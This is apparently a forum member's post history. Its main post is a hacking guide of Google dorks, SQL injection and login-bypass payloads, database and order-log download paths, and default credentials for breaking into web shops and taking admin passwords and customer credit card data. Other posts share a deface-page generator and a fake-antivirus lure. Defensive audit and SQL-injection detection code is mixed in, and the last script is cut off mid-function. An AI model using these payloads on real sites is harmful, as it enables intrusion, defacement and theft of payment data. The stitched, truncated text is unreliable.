Everything posted by LegioNRST
-
Most of these are outdated but they can still work if you happen to find a vulnerable site:

1- google dork :--> inurl:"/cart.php?m="
target looks like :--> http://xxxxxxx.com/s...cart.php?m=view
exploit: change cart.php?m=view to /admin
target with exploit :--> http://xxxxxx.com/store/admin
Username : 'or"="
Password : 'or"="

2- google dork :--> allinurl:proddetail.asp?prod=
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big letters and numbers)
exploit :--> change the proddetail.asp?prod=SG369 with fpdb/vsproducts.mdb
target with exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb

3- google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.co....dd=action&key=
exploit :--> ...&template=order.log
target with exploit :--> http://www.xxxxxxxx.....late=order.log

4- google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target with exploit :--> www.xxxxx.com/fpdb/shop.mdb

5- google dork :--> allinurl:/vpasp/shopsearch.asp
when you find a target put this in the search box:
Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Don't forget to replace the and with whatever you like.
To change the admin password, enter the following keyword:
Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp

6- google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-
if this is not working try these endings: %20'a%25'-- %20'b%25'-- %20'c%25'--
after finding user and pass go to the login page: http://xxxx.com/vpasp/shopadmin.asp

7- google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
exploit: user : 'or'1  pass : 'or'1

8- google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.co....short_blue.htm
exploit :--> ../admin/files/order.log
target with exploit :--> http://www.xxxxxxx.c....iles/order.log

9- google.com :--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target with exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb

10- google.com :--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target with exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt

11- google.com :--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target with exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after getting that page look for dbname and path. (these are also good files: sdatapdshoppro.mdb, access.mdb)
target for downloading the database :--> www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
in the db look for "access" to find the pass and user of the shop admins.

12- google.com :--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target with exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target with exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target with exploit order.log :--> http://www.xxxxx.com....iles/order.log

13- google.com :--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :--> /cg-bin/eshop/database/order.mdb
target with exploit :--> http://www.xxxxxx.co....base/order.mdb
after downloading the db look at "access" for user and password

14-
1/ search google: allinurl:"shopdisplayproducts.asp?id=
---> http://victim.com/shopdisplayproducts.asp?id=5
2/ find the error by adding '
---> http://victim.com/shopdisplayproducts.asp?id=5'
---> error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
- If you don't see the error then change id to cat
---> http://victim.com/shopdisplayproducts.asp?cat=5'
3/ if this shop has the error then add this: %20union%20select%201%20from%20tbluser"having%201=1--sp_password
---> http://victim.com/shopdisplayproduct...on%20select%201%20from%20tbluser"having%201=1--sp_password
---> error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of columns in the two selected tables or queries of a union query do not match......
4/ add 2,3,4,5,6....... until you see a nice table
add 2 ----> http://victim.com/shopdisplayproduct...on%20select%201,2%20from%20tbluser"having%201=1--sp_password
then 3 ----> http://victim.com/shopdisplayproduct...on%20select%201,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ----> http://victim.com/shopdisplayproduct...on%20select%201,2,3,4%20from%20tbluser"having%201=1--sp_password
...5,6,7,8,9.... until you see a table.
(exp: ...47) ----> http://victim.com/shopdisplayproduct...on%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
----> see a table.
5/ When you see a table, change 4 to fldusername and 22 to fldpassword and you will have the admin username and password
---> http://victim.com/shopdisplayproduct...on%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser%22having%201=1--sp_password
6/ Find the admin link to login: try this first: http://victim.com/shopadmin.asp or: http://victim.com/shopadmin.asp
Didn't work? then you have to find it yourself: add (for the above example):
'%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
---> http://victim.com/shopdisplayproduct...n%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
you'll see something like (a lot of them):
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
then guess the admin link by adding the above data until you find the admin links

15- Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed. Now let's get to the exploit..
the page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
so do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear with something like:
xDatabase shopping140
xDblocation resx
xdatabasetype xEmail xEmailName xEmailSubject xEmailSystem xEmailType xOrdernumber
.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database.. Try this while there is dblocation.
xDblocation resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If you see the error message you have to try this: ****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer; you should be able to find one at download.com. inside you should be able to find credit card information. and you should even be able to find the admin username and password for the website.
the admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file, or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are
Username: admin password: admin
OR
Username: vpasp password: vpasp

16- Sphider Version 1.2.x (include_dir) remote file inclusion
# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php:
$include_dir = "./include"; <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";
exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu
PS: I don't have the source.
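Almost every entry in this post that ends in an .mdb, order.log or orders.txt download is the same weakness seen from the attacker's side: a data file sitting under the document root where the web server happily serves it. From the defender's side, here is an added example (my own code, not from the post): a local audit that walks a web root and lists such files, plus the Apache 2.4 rule that refuses direct requests for those extensions. The sensitive-name lists and the sample tree are constructed from file names that appear in the post; `audit_webroot`, `apache_deny_rule` and `build_sample_webroot` are names of my own.

```python
import os
import shutil
import tempfile

# File types and locations that should never be reachable through the web server.
# Names and extensions are taken from the shop packages discussed in the post
# (Access .mdb databases, order logs, admin config scripts); illustrative, not exhaustive.
SENSITIVE_EXTENSIONS = {".mdb", ".log", ".bak", ".sql"}
SENSITIVE_NAMES = {"orders.txt", "order.log", "admin_conf.pl", "dbsetup.asp", "diag_dbtest.asp"}
SENSITIVE_DIRS = {"fpdb", "database", "orders"}


def audit_webroot(root):
    """Walk `root` and return a sorted list of (relative_path, reason) for files that
    look like data stores, logs or diagnostics left inside the served tree."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        dir_parts = set() if rel_dir == "." else set(rel_dir.lower().split(os.sep))
        flagged_dirs = dir_parts & SENSITIVE_DIRS
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            lower = name.lower()
            ext = os.path.splitext(lower)[1]
            if ext in SENSITIVE_EXTENSIONS:
                findings.append((rel, "data/log file extension " + ext))
            elif lower in SENSITIVE_NAMES:
                findings.append((rel, "known sensitive file name"))
            elif flagged_dirs:
                findings.append((rel, "inside data directory " + "/".join(sorted(flagged_dirs))))
    return sorted(findings)


def apache_deny_rule(extensions=None):
    """Apache 2.4 snippet (for .htaccess or a <Directory> block) that refuses direct
    requests for the given extensions. Hypothetical helper: moving the files out of
    the web root is the real fix, this rule is only a second layer."""
    exts = sorted(extensions or SENSITIVE_EXTENSIONS)
    pattern = "|".join(e.lstrip(".") for e in exts)
    return '<FilesMatch "\\.(%s)$">\n    Require all denied\n</FilesMatch>' % pattern


def build_sample_webroot():
    """Create a constructed sample document root mirroring layouts named in the post."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel in ("index.asp",
                "shop/shopdisplaycategories.asp",
                "shop/shopping140.mdb",
                "fpdb/vsproducts.mdb",
                "DCShop/orders/orders.txt",
                "cgi-bin/commercesql/admin_conf.pl",
                "images/logo.gif"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
    return root


def audit_sample():
    """Build the constructed tree, audit it, remove it again and return the findings."""
    root = build_sample_webroot()
    try:
        return audit_webroot(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, reason in audit_sample():
        print("%-40s %s" % (rel, reason))
    print(apache_deny_rule())
```

Run against a real document root with `audit_webroot("/var/www/html")`; anything it lists should be moved outside the served tree (the Access database in particular), and the `FilesMatch` block is there so that a file copied back by mistake is still not downloadable.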
-
Link: http://jhnet.co.uk/fakeav/virus.htm The only thing that could give you away is the "virus.htm" part, otherwise... some people fell for it :))
-
If it comes to your home, you can simply not sign.
-
I browsed a bit on my cousin's Dell two days ago and I like how it runs.
-
I want to buy a laptop but I keep hearing more and more debates and I don't know which ones are good. I saw an Acer at a friend's and liked how it ran.. What laptop do you recommend?
-
Website security is a crucial thing for any organization or personal site. It is recommended that you check your site's security, because it is better to be sure and to know the "holes" in the website before an attacker finds and exploits them. The most common vulnerabilities of a web application are usually:
* SQL Injection
* Cross Site Scripting (XSS)
* Cross Site Request Forgery (CSRF)
* Insecure Session Handling
* Session Fixation
* Information Disclosure
* Header Injection
* Insecure Configuration
* Weak randomness

Over time, many tools have been developed to provide better security by discovering various vulnerabilities. A vulnerability scanner is built with the purpose of detecting the "holes". Some of these tools also offer suggestions for prevention methods that could be implemented. The main reason we prefer automated tools is that the manual exploitation process can lead to incorrect results that can wreak havoc on the application. A very large number of scanning applications are available, commercial or open source. E.g.:
* Websecurify
* Net Sparker Community Edition
* WSSA
* NStalker
* W3af
* Acunetix

1. Websecurify
Websecurify is a tool available on Windows, Linux or MAC. It is the best tool when it comes to the usual vulnerabilities. Once the target has been set for scanning, the tool starts working and presents the results once it has finished. The scan result will contain the vulnerability description, solutions and the vulnerable URL, which helps us understand and fix the vulnerability as quickly as possible.
Example result:
It can detect vulnerabilities such as SQLi, LFI/RFI, XSS, CSRF and other categories from the OWASP top 10. This tool also has an online version of the scanner. Link: http://scanner.websecurify.com/
Note: the online scanner is still in beta.
Features:
* Easy to use
* Simultaneous tests
* Advanced reports

2 - NetSparker
http://www.mavitunasecurity.com/netsparker/
NetSparker is likewise an efficient vulnerability scanner for websites, very easy to use. To start scanning, click the "Start New Scan" option, then enter the target URL, then click start scan to scan the site. You will see 3 tabs: vulnerability, browser view and HTTP request/response. In the vulnerability tab you can find information about the vulnerable URL, a description, the impact it has and how it can be fixed. You can view the vulnerability diagram to understand how serious the problem is.
Features:
* Post exploitation takes exploitation to the next level
* The scanner has a built-in encoder.
* There is an option for controlled scanning.

Web Security Audit - WSSA
URL: Web Site Security Audit - WSSA by Beyond Security
Beyond security, good web vulnerability scanners also have network scanning integrated. WSSA comes with the Automated Vulnerability Detection System (AVDS), focused on accuracy. One problem in web application scanning is the "false positive". There are many scanners that will give you a long list of possible vulnerabilities, of which some are more or less actually present. Host testing is more a matter of penetration testing. Version checking, which assumes the vulnerability is there, is usually inaccurate. For more information about these two testing methods. At the same time, some scanners have a false positive rate of 10%. Many of them even 3%. AVDS is at 1%. This low rate considerably reduces the time spent looking for vulnerabilities that are reported but do not actually exist. The scanner is paid only, but it can be used on a 15-day trial. Moreover, it comes with a web scanner that provides very detailed reports that can be easily understood by a normal person.
The results are received fairly quickly and the whole service comes free, if you are interested. The first step would be to go to the website. Step 2: use the email associated with your domain. Once you have finished, you will receive detailed information about the domain at the specified email. The online scanner can detect most vulnerabilities, such as badly coded pages or database connections with problems. Example: SQL injection, XSS, RFI, PHP/ASP code injection, directory traversal or file disclosure. With this service we can identify the results of an attack by a virus, trojan or worm. Example: malicious code that opens a TCP port for unauthorised use of the internet. Misconfigured systems. Example: a service that uses a known user or password; or omitted security updates/patches.
Source: Insecurity.ro
-
do you think I wouldn't have put the source if I had it? I had the script in an old document.
-
Deface page creator:
Use: deface.py yourpage.html
[code]
# Python 2 script (print statements, raw_input); run it with a Python 2 interpreter.
import sys
import time

if len(sys.argv) < 2:
    print 'Usage deface.py index.html , this will create an index.html file with deface .'
    sys.exit()

file = sys.argv[1]
myfile = open(file, 'w')

# 1. background colour
print ' Colors: '
print '-----------------------------------------------------------------------------'
print ' | black | white | '
print '================================================================'
while True:
    var = raw_input('1.Type the color for background here => ')
    if var in ['black', 'white']:
        break
    else:
        print 'Wrong color..!'
print >> myfile, '<body bgcolor=', '"', (var), '"', '>'

# 2. text colour
print '================================================================'
print ' Colors '
print ' | black | white | green | red | purple | blue | gray | '
print '================================================================'
while True:
    var1 = raw_input('2.Type the text color here => ')
    if var1 in ['black', 'white', 'green', 'orange', 'red', 'purple', 'blue', 'gray']:
        break
    else:
        print 'Wrong color..!'
print >> myfile, '<p align="center"><b><font color=', '"', (var1), '"', 'size="3">'

# 3. image; the list offered depends on the background colour chosen
if var == 'black':
    print '================================================================'
    print ' Choose an image : '
    print '| hacked1 | fingerprint | spy | hacked2 | silence | gameover |'
    print '| leg | hand | hitman | smoke | hacked3 | '
    print ' | other | '
    print '================================================================'
    while True:
        var4 = raw_input('3.Put the image name here => ')
        if var4 in ['hacked1', 'fingerprint', 'spy', 'hacked2', 'silence', 'gameover',
                    'leg', 'hand', 'hitman', 'smoke', 'hacked3', 'other']:
            break
        else:
            print 'Wrong image name..! '
    print '================================================================'
    if var4 == 'fingerprint':
        print >> myfile, ' <center><img src="http://www.mandel.ro/logos/animFingerprintBlack.gif"></center>'
    if var4 == 'hacked1':
        print >> myfile, ' <center><img src="http://site.mynet.com/the_chip/hacked2323.jpg"></center>'
    if var4 == 'spy':
        print >> myfile, ' <center><img src="http://www.bluesilk.hu/images/stories/spy.gif"></center>'
    if var4 == 'hacked2':
        print >> myfile, ' <center><img src="http://expclan.comli.com/index_files/43084476ii9.png"></center>'
    if var4 == 'silence':
        print >> myfile, ' <center><img src="http://demafmipauns.files.wordpress.com/2010/05/sayu0i.jpg"></center>'
    if var4 == 'gameover':
        print >> myfile, '<center><img src="http://img10.imageshack.us/img10/4974/yumaqalt.jpg"></center>'
    if var4 == 'leg':
        print >> myfile, '<center><img src="http://img268.imageshack.us/img268/6802/thehackerericborgozone1.jpg"></center>'
    if var4 == 'hand':
        print >> myfile, '<center><img src="http://i728.photobucket.com/albums/ww286/vyc0d/owned.jpg"></center>'
    if var4 == 'hitman':
        print >> myfile, '<center><img src="http://t0.gstatic.com/images?q=tbn:lYCsFDr4o7mh1M:http://www.renoascensori.it/hacked.jpg&t=1"></center>'
    if var4 == 'smoke':
        print >> myfile, '<center><img src="http://t1.gstatic.com/images?q=tbn:YgDh8qCPAtwgoM:http://i46.tinypic.com/2gtxdo1.jpg&t=1"></center>'
    if var4 == 'hacked3':
        print >> myfile, '<center><img src="http://img.webme.com/pic/c/cobbra-g3ncii/hacked.jpg"></center>'
    if var4 == 'other':
        while True:
            var4 = raw_input('Please enter the URL of your picture here: ')
            if var4.endswith(('.jpg', '.png', '.gif', '.JPG', '.PNG', '.GIF')):
                break
            else:
                print 'Wrong image name..! '
        print >> myfile, '<center><img src="', (var4), '"></center>'

if var == 'white':
    print '================================================================'
    print ' Choose an image : '
    print ' | eye | door | fingerprint | wanted | sleep | other | '
    print '================================================================'
    while True:
        var4 = raw_input('3.Put the image name here => ')
        if var4 in ['door', 'fingerprint', 'wanted', 'sleep', 'eye', 'other']:
            break
        else:
            print 'Wrong image...'
    print '================================================================'
    if var4 == 'door':
        print >> myfile, '<center><img src="http://www.cdscreative.com/images/door.jpg"></center>'
    if var4 == 'fingerprint':
        print >> myfile, ' <center><img src="http://www.idfpr.com/DPR/images/fingerprint.gif"></center>'
    if var4 == 'wanted':
        print >> myfile, ' <center><img src="http://www.allstarcardsinc.com/_derived/buy_list.htm_txt_wanted1.gif"></center>'
    if var4 == 'sleep':
        print >> myfile, ' <center><img src="http://www.do2learn.com/picturecards/images/imageschedule/sleep_l.gif"></center>'
    if var4 == 'eye':
        print >> myfile, ' <center><img src="http://www.christina-reysen.com/images/eye_open.gif"></center>'
    if var4 == 'other':
        while True:
            var4 = raw_input('Please enter the URL of your picture here: ')
            if var4.endswith(('.jpg', '.png', '.gif', '.JPG', '.PNG', '.GIF')):
                break
            else:
                print 'Must enter an URL that contains an image file..! '
        print >> myfile, '<center><img src="', (var4), '"></center>'

# 4. signature, written as an animated "fly-in" heading
print '================================================================'
while True:
    var2 = raw_input('4.put your signature here => ')
    if len(var2) < 30:
        break
    else:
        print 'Signature too large..!'
print >> myfile, '<script>'
print >> myfile, 'if (document.layers)'
print >> myfile, 'var ns4def=""'
print >> myfile, '</script>'
print >> myfile, '<p align="center"><b><font size="4">'
print >> myfile, '<h2 id="flyin"style="position:relative;left:-400;font-style:italic"'
print >> myfile, 'style=&{ns4def};>'
print >> myfile, '<font face="Arial">', 'Owned by', (var2), '</font></h2>'
print >> myfile, '</font></b></p>'
print >> myfile, '<script language="JavaScript1.2">'
print >> myfile, 'if (document.getElementById||document.all)'
print >> myfile, 'var crossheader=document.getElementById? document.getElementById("flyin").style : document.all.flyin.style'
print >> myfile, 'function animatein(){'
print >> myfile, 'if (parseInt(crossheader.left)<0)'
print >> myfile, 'crossheader.left=parseInt(crossheader.left)+20'
print >> myfile, 'else{'
print >> myfile, 'crossheader.left=0'
print >> myfile, 'crossheader.fontStyle="normal"'
print >> myfile, 'clearInterval(start)'
print >> myfile, '}'
print >> myfile, '}'
print >> myfile, 'if (document.getElementById||document.all)'
print >> myfile, 'start=setInterval("animatein()",50)'
print >> myfile, '</script>'
print >> myfile, '<p>'
print >> myfile, '<font face="Tahoma"><a target="_blank"'

# 5. optional extra message
print '================================================================'
print ' Choose: '
print ' | yes | no | '
print '================================================================'
while True:
    var7 = raw_input('Do you want to add some other text message?: ')
    if var7.lower() == 'no':
        print '================================================================'
        print ' Wait...'
        time.sleep(1)
        myfile.close()
        print 'Your HTML file is ready ,I will exit now... '
        time.sleep(2)
        sys.exit()
    elif var7.lower() == 'yes':
        break
    else:
        print ("Please enter 'yes' or 'no' ...!")
print '================================================================'
print ' Choose one of the color from the list '
print ' | black | white | green | red | purple | blue | gray | '
print '================================================================'
while True:
    var8 = raw_input('Type the text color that you want here => ')
    # 'gray' used to carry a trailing space here, which made it impossible to select
    if var8 in ['black', 'white', 'green', 'orange', 'red', 'purple', 'blue', 'gray']:
        break
    else:
        print 'Wrong color..!'
print >> myfile, '<p align="center"><b><font color=', '"', (var8), '"', 'size="3">'
print '================================================================'
while True:
    var9 = raw_input('Put your comments here => ')
    if len(var9) < 150:
        break
    else:
        print 'Comments are too large..!'
print >> myfile, var9
print >> myfile, '</font></b></p>'
print '================================================================'
print 'Processing your HTML file please wait...'
time.sleep(2)
print '...'
time.sleep(2)
myfile.close()
print ' Work done ,your HTML file was defaced , i will exit... '
time.sleep(1)
sys.exit()
#END
[/code]
http://hotfile.com/dl/61475254/9850a03/def.tar.gz.html

SQLInject finder:
[code]
#!/usr/bin/env python
# -------------------------------------------------------------------------------
#
# sqlinject-finder.py
# Description: Simple python script that parses through a pcap and looks at the
# GET and POST request data for suspicious and possible SQL injects.
#
# ####################################################################################
# Python 2 script; needs the dpkt library (pip install dpkt under Python 2).

import dpkt, re, urllib, sys, getopt

tab = False

#removes inline comments that can sometimes be used for obfuscating the sql
def removeComments(val):
    while True:
        index = val.find("/*")
        if index == -1:
            break
        #look for the closing marker only after the opening one; searching the whole
        #string found a "*/" placed before "/*", removed nothing and looped forever
        index2 = val.find("*/", index + 2)
        if index2 == -1:
            break
        #looks like there is some type of SQL obfuscation, let's remove the comment
        val = val[:index] + val[index2+2:]
    return val

#checks for common sql injection tactics using all the variables from post or get data
def analyzeRequest(vals, sIP, page, frameno):
    var = vals[0]  #the variable, i.e. in id=1, the var is id
    val = vals[1]  #the value, i.e. in id=1, the val is 1
    val = val.decode('ascii', 'ignore')  #drop non ascii bytes instead of raising on them
    val = urllib.unquote(val)  #removes url encodings like %20 for space, etc
    val = val.replace("+", " ")  #sometimes in urls, instead of a space you can have a + . So, we want to remove those for analysis
    #print val
    display = [False, sIP, page, var, val]

    ##### Look for obfuscation techniques ######
    index = val.find("/*")
    if index != -1:
        display[0] = True
        display.append("Might be attempting to obfuscate a SQL statement with a comment")
        val = removeComments(val)

    ##### Look for commenting out the end of a MSSQL statement ######
    index = val.rfind("--")
    if index != -1:
        display[0] = True
        display.append("Might be attempting to end a SQL statement by commenting out the remaining statement")

    ##### Look for commenting out the end of a MySQL statement #####
    index = val.rfind("#")
    if index != -1:
        display[0] = True
        display.append("Might be attempting to end a SQL statement by commenting out the remaining statement")

    ##### Look for common SQL syntax in the values of a param #####
    #all lower case, because they are compared against val.lower() below
    sqlvals = ("cast(", "declare ", "select ", "union ", "varchar", "set(", "create ", " or ", " null,", " concat(")
    for sql in sqlvals:
        index = val.lower().find(sql)
        if index != -1:
            display[0] = True
            display.append("Possible use of SQL syntax in variable")
            break

    if display[0] == True:
        if tab:
            line = str(display[1]) + "\t" + str(display[2]) + "\t" + str(display[3]) + "=" + str(display[4]) + "\t" + str(frameno)
            for i in range(len(display)-5):
                line = line + "\t" + str(display[i+5])
            print line
        else:
            print "Source : " + str(display[1])
            print "Page : " + str(display[2])
            print "Value : " + str(display[3]) + "=" + str(display[4])
            print "Frame : " + str(frameno)
            for i in range(len(display)-5):
                print "Reason : " + str(display[i+5])
            print ""

#turns the 4 raw address bytes from dpkt into dotted decimal
def octetIP(sIP):
    ip = ""
    for s in sIP:
        ip = ip + str(ord(s)) + "."
    return ip[:-1]

#reads the pcap file and parses out get and post requests for analysis
def parsepcap(filename):
    try:
        f = open(filename, 'rb')
    except:
        print "Error reading file. Please make sure the file exists"
        sys.exit()
    try:
        pcap = dpkt.pcap.Reader(f)
    except:
        print "Error reading file. Please make sure the file is a valid pcap file."
        sys.exit()
    sIP = ""
    page = ""
    frameno = 1
    for ts, buf in pcap:
        eth = dpkt.ethernet.Ethernet(buf)
        ip = eth.data
        #make sure we are dealing with ip (2048) and tcp (proto=6)
        if eth.type == 2048 and ip.p == 6:
            tcp = ip.data
            #assuming http is running on port 80
            if tcp.dport == 80 and len(tcp.data) > 0:
                index = 1
                getvals = ""
                try:
                    http = dpkt.http.Request(tcp.data)
                    url = http.uri
                    #deal with post data
                    if http.method == "POST":
                        getvals = http.body
                        index = url.find("?")
                        if index != -1:
                            page = url[:index]
                        else:
                            page = url
                    #deal with GET data
                    elif http.method == "GET":
                        index = url.rfind("?")
                        if index != -1:
                            getvals = url[index+1:]
                            page = url[:index]
                except:
                    data = tcp.data
                    index = str(data).find("POST")
                    if index == 0:
                        url = str(data).split(" ")
                        page = url[1]  #POST is usually always the second value in the POST
                    index = str(data).count("\n")
                    #need to look into this method a little more, basically, we want to get POST data out of other streams
                    if index == 0:
                        index = str(data).find("=")
                        if index != -1:
                            getvals = str(data)
                #split up each variable and its corresponding value
                if getvals != "":
                    getvals = getvals.split("&")
                    for val in getvals:
                        i = val.find("=")
                        val = (val[:i], val[i+1:])
                        sIP = octetIP(ip.src)
                        analyzeRequest(val, sIP, page, frameno)
        frameno += 1
    f.close()

#usage stuff
def usage():
    print ""
    print "This tool parses through a pcap file and looks for potential SQL injection attempts."
    print ""
    print "usage: sqlinject-finder.py -f filename [-t]"
    print "Options and arguments (and corresponding environment variables):"
    print "-f, --filename : valid pcap file"
    print "-t, --tab : prints output in tab delimited format"
    print "-h, --help : shows this screen"
    print ""
    print "Example: #python sqlinject-finder.py -f capture.pcap"
    print " #python sqlinject-finder.py -f capture.pcap -t > capture.tsv"
    print ""

def main():
    global tab
    try:
        opts, args = getopt.getopt(sys.argv[1:], "f:th", ["filename=", "tab", "help"])
    except getopt.GetoptError, err:
        print str(err)
        usage()
        sys.exit(2)
    filename = ""
    for o, a in opts:
        if o in ("-f", "--filename"):
            filename = a
        elif o in ("-t", "--tab"):
            tab = True
        elif o in ("-h", "--help"):
            usage()
            sys.exit()
        else:
            usage()
            sys.exit()
    if (filename == ""):
        print "please specify a filename"
        sys.exit()
    if tab:
        print "Source\tPage\tValue\tFrame\tReason(s)"
    parsepcap(filename)

if __name__ == "__main__":
    main()
[/code]
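The posted sqlinject-finder.py needs dpkt and a capture file before it shows anything. As an added example (my own code, not the poster's script), here are the same heuristics run in Python 3 over constructed web-server access-log lines, so the detection logic can be checked offline: URL-decode the parameter value, collapse `/* */` comments, then look for comment terminators and SQL keywords. The log lines, the `LOG_RE` pattern and the function names are mine; the keyword list is the one from the posted script. It also covers the case where a `*/` appears before `/*`, which any find-and-remove comment stripper has to handle or it never terminates.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Common Log Format), not taken from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2011:10:01:02 +0000] "GET /shopdisplayproducts.asp?cat=5 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2011:10:01:07 +0000] "GET /shopdisplayproducts.asp?cat=5%27%20union%20select%201%20from%20tbluser-- HTTP/1.1" 500 310
10.0.0.9 - - [12/Mar/2011:10:01:11 +0000] "GET /product.php?id=1/**/or/**/1=1%23 HTTP/1.1" 200 7742
10.0.0.12 - - [12/Mar/2011:10:01:15 +0000] "GET /search.php?q=red+shoes HTTP/1.1" 200 2210
10.0.0.9 - - [12/Mar/2011:10:01:20 +0000] "GET /item.php?id=*/x/*1*/ HTTP/1.1" 200 100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Keyword list from the posted tool, lower-cased so the comparison is case-insensitive.
SQL_TOKENS = ("cast(", "declare ", "select ", "union ", "varchar", "set(",
              "create ", " or ", " null,", " concat(")


def strip_comments(value):
    """Replace each /* ... */ sequence with one space.

    The closing marker is searched for only after the opening one, so a stray
    leading '*/' (as in '*/x/*1*/') cannot make the loop spin, and an unterminated
    '/*' is left alone. A space is substituted rather than nothing because /**/ is
    commonly used in place of whitespace; keeping the word boundary lets the keyword
    check below still see ' or '. (This is a deliberate difference from the posted
    script, which deletes the comment outright.)
    """
    while True:
        start = value.find("/*")
        if start == -1:
            return value
        end = value.find("*/", start + 2)
        if end == -1:
            return value
        value = value[:start] + " " + value[end + 2:]


def analyze_value(raw):
    """Return the reasons a raw (still percent-encoded) parameter value looks like SQL injection."""
    reasons = []
    value = unquote_plus(raw)  # %27 -> ', %20 and + -> space
    if "/*" in value:
        reasons.append("inline /* */ comment (possible obfuscation)")
        value = strip_comments(value)
    if "--" in value:
        reasons.append("-- comment sequence (truncates the rest of the statement)")
    if "#" in value:
        reasons.append("# comment sequence (MySQL)")
    lowered = value.lower()
    if any(tok in lowered for tok in SQL_TOKENS):
        reasons.append("SQL keyword in parameter value")
    return reasons


def scan_log(text):
    """Parse access-log lines and return one finding per suspicious query parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Split the query string ourselves so analyze_value sees the raw encoding.
        for pair in parts.query.split("&"):
            if not pair:
                continue
            name, _, raw = pair.partition("=")
            reasons = analyze_value(raw)
            if reasons:
                findings.append({
                    "line": lineno,
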